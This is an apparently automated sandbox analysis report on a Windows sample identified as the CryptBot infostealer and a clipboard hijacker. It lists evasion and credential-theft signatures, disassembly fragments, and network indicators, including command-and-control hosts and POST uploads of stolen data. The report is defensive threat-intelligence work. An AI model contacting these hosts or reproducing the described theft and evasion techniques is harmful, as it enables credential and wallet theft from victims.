Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1559089
MD5: 86dce43872ffd26d6225323bf7f0c76f
SHA1: 9bee03858ee62de271b3b29b0144b27892927a13
SHA256: 2eeba583715e37c4f8632f58d1c49a6d0ef7fdf6815d4bc7593c492a45aca663
Tags: exeuser-Bitsight

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name: CryptBot
Description: A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection

Source: file.exe Avira: detected
Source: file.exe Virustotal: Detection: 45%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_009F15B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 8_2_009F15B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 8_2_6C0E14B0
Source: file.exe, 00000000.00000003.1752173167.0000000007862000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_3f6396ec-5
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 8_2_009F81E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C15AEC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C15AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C100860
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C10A970
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C10A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C10A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C1BF960h 8_2_6C0FEB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C104453
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 8_2_6C1884A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C10C510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C10A580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C10A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6C10A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C10E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C10E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 8_2_6C180730
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C100740
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C15C040
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C15C1A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 8_2_6C13A1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6C100260
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [6C1BD014h] 8_2_6C1B4360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C15BD10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6C157D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 8_2_6C153840
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+04h] 8_2_6C10D974
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C139B60
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C11BBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C11BBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C15B4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6C10D504
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 8_2_6C159600
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] 8_2_6C10D674
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C1BDFF4h 8_2_6C153690
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+08h] 8_2_6C10D7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 8_2_6C183140
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C0FB1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6C10D2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 8_2_6C177350
Source: chrome.exe Memory has grown: Private usage: 5MB later: 23MB

Networking

Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49736 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49753 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49739 -> 34.116.198.130:80
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1 Host: home.fvtekk5pn.top Accept: */*
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1 Host: fvtekk5pn.top Accept: */* Content-Length: 464 Content-Type: multipart/form-data; boundary=------------------------1YvXSLVPJAoQ5dCNS65LHK Content-Disposition: form-data; name="file"; filename="Jajeqelu.bin" Content-Type: application/octet-stream
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1 Host: fvtekk5pn.top Accept: */* Content-Length: 76571 Content-Type: multipart/form-data; boundary=------------------------kauhXkVPYhzLhMSx47SQqL
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1 Host: fvtekk5pn.top Accept: */* Content-Length: 27812 Content-Type: multipart/form-data; boundary=------------------------XanHhr2A1jI3E7wL1nB93y
Source: Joe Sandbox View IP Address: 239.255.255.250
Source: Joe Sandbox View IP Address: 34.116.198.130
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: chrome.exe, 00000004.00000002.2013142918.0000197C02A0F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012577747.0000197C028E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.2013142918.0000197C02A0F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012577747.0000197C028E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.2013142918.0000197C02A0F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012577747.0000197C028E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.2013142918.0000197C02A0F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012577747.0000197C028E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.2010709999.0000197C024C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: home.fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: unknown HTTP traffic detected: POST /v1/upload.php HTTP/1.1 Host: fvtekk5pn.top Accept: */* Content-Length: 464 Content-Type: multipart/form-data; boundary=------------------------1YvXSLVPJAoQ5dCNS65LHK Content-Disposition: form-data; name="file"; filename="Jajeqelu.bin" Content-Type: application/octet-stream
Source: file.exe, 00000000.00000003.1752173167.0000000007862000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.css
Source: file.exe, 00000000.00000003.1752173167.0000000007862000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.jpg
Source: chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 00000004.00000002.2012171630.0000197C0281C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: chrome.exe, 00000004.00000002.2009692178.0000197C0227E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://google.com/
Source: file.exe, 00000000.00000003.1752173167.0000000007862000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW17
Source: file.exe, 00000000.00000003.1752173167.0000000007862000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://html4/loose.dtd
Source: chrome.exe, 00000004.00000003.1991353067.0000197C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2015193470.0000197C02E98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://issuetracker.google.com/200067929
Source: chrome.exe, 00000004.00000002.2017003208.0000197C03250000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1996222746.0000197C03234000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1996101435.0000197C03224000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1996294481.0000197C03118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jsbin.com/temexa/4.
Source: chrome.exe, 00000004.00000002.2017003208.0000197C03250000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1996222746.0000197C03234000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1996101435.0000197C03224000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1996294481.0000197C03118000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2010772592.0000197C024FB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1996258149.0000197C03284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chrome.exe, 00000004.00000002.2017003208.0000197C03250000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1996222746.0000197C03234000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1996101435.0000197C03224000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1996294481.0000197C03118000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2010772592.0000197C024FB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1996258149.0000197C03284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chrome.exe, 00000004.00000002.2017003208.0000197C03250000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1996222746.0000197C03234000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1996101435.0000197C03224000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1996294481.0000197C03118000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2010772592.0000197C024FB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1996258149.0000197C03284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chrome.exe, 00000004.00000002.2017003208.0000197C03250000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1996222746.0000197C03234000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1996101435.0000197C03224000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1996294481.0000197C03118000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2010772592.0000197C024FB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1996258149.0000197C03284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chrome.exe, 00000004.00000002.2013862489.0000197C02BAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
Source: chrome.exe, 00000004.00000002.2013965792.0000197C02BE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unisolated.invalid/
Source: chrome.exe, 00000004.00000002.2013965792.0000197C02BE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unisolated.invalid/a
Source: Amcache.hve.13.dr String found in binary or memory: http://upx.sf.net
Source: chrome.exe, 00000004.00000002.2014152138.0000197C02C3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.gstatic.com/generate_204
Source: chrome.exe, 00000004.00000002.2014997393.0000197C02E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 00000004.00000002.2009781408.0000197C02288000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000004.00000002.2011400899.0000197C02628000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000004.00000002.2009525854.0000197C0220C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000004.00000002.2010378097.0000197C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000004.00000002.2011576641.0000197C026BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo?source=ChromiumBrowser
Source: chrome.exe, 00000004.00000002.2014152138.0000197C02C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2009781408.0000197C02288000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2011400899.0000197C02628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012171630.0000197C0281C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
Source: chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000004.00000002.2010378097.0000197C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 00000004.00000002.2010378097.0000197C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout1
Source: chrome.exe, 00000004.00000002.2011576641.0000197C026BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout?source=ChromiumBrowser&continue=https://accounts.google.com/chrom
Source: chrome.exe, 00000004.00000002.2010378097.0000197C023C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2012171630.0000197C0281C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 00000004.00000002.2012171630.0000197C0281C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/MergeSession/
Source: chrome.exe, 00000004.00000002.2010378097.0000197C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 00000004.00000002.2014152138.0000197C02C3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin?source=ChromiumBrowser&issueuberauth=1
Source: chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000004.00000002.2009845291.0000197C022A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000004.00000002.2009845291.0000197C022A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000004.00000002.2009845291.0000197C022A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000004.00000002.2009781408.0000197C02288000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000004.00000002.2012171630.0000197C0281C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000004.00000002.2012290970.0000197C02878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000004.00000002.2010448279.0000197C0240C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 00000004.00000002.2010378097.0000197C023C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com:443
Source: file.exe, 00000000.00000003.1752173167.0000000007862000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/test
Source: file.exe, 00000000.00000003.1752173167.0000000007862000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/testFailed
Source: chrome.exe, 00000004.00000002.2014958452.0000197C02E1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1988906922.0000197C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991393180.0000197C02A40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991353067.0000197C02580000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000004.00000002.2014958452.0000197C02E1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1988906922.0000197C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991393180.0000197C02A40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991353067.0000197C02580000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000004.00000002.2014958452.0000197C02E1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1988906922.0000197C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991393180.0000197C02A40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991353067.0000197C02580000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000004.00000002.2014958452.0000197C02E1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1988906922.0000197C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991393180.0000197C02A40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991353067.0000197C02580000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000004.00000002.2014958452.0000197C02E1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1988906922.0000197C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991393180.0000197C02A40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991353067.0000197C02580000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000004.00000002.2014958452.0000197C02E1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1988906922.0000197C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991393180.0000197C02A40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991353067.0000197C02580000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000004.00000002.2011467767.0000197C02684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1988906922.0000197C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991393180.0000197C02A40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991353067.0000197C02580000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000004.00000002.2014958452.0000197C02E1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1988906922.0000197C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991393180.0000197C02A40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991353067.0000197C02580000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000004.00000002.2014958452.0000197C02E1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1988906922.0000197C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991393180.0000197C02A40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991353067.0000197C02580000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000004.00000002.2014958452.0000197C02E1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1988906922.0000197C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991393180.0000197C02A40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991353067.0000197C02580000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000004.00000002.2014958452.0000197C02E1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1988906922.0000197C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991393180.0000197C02A40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991353067.0000197C02580000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000004.00000002.2014958452.0000197C02E1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1988906922.0000197C02580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991393180.0000197C02A40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1991353067.0000197C02580000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7382
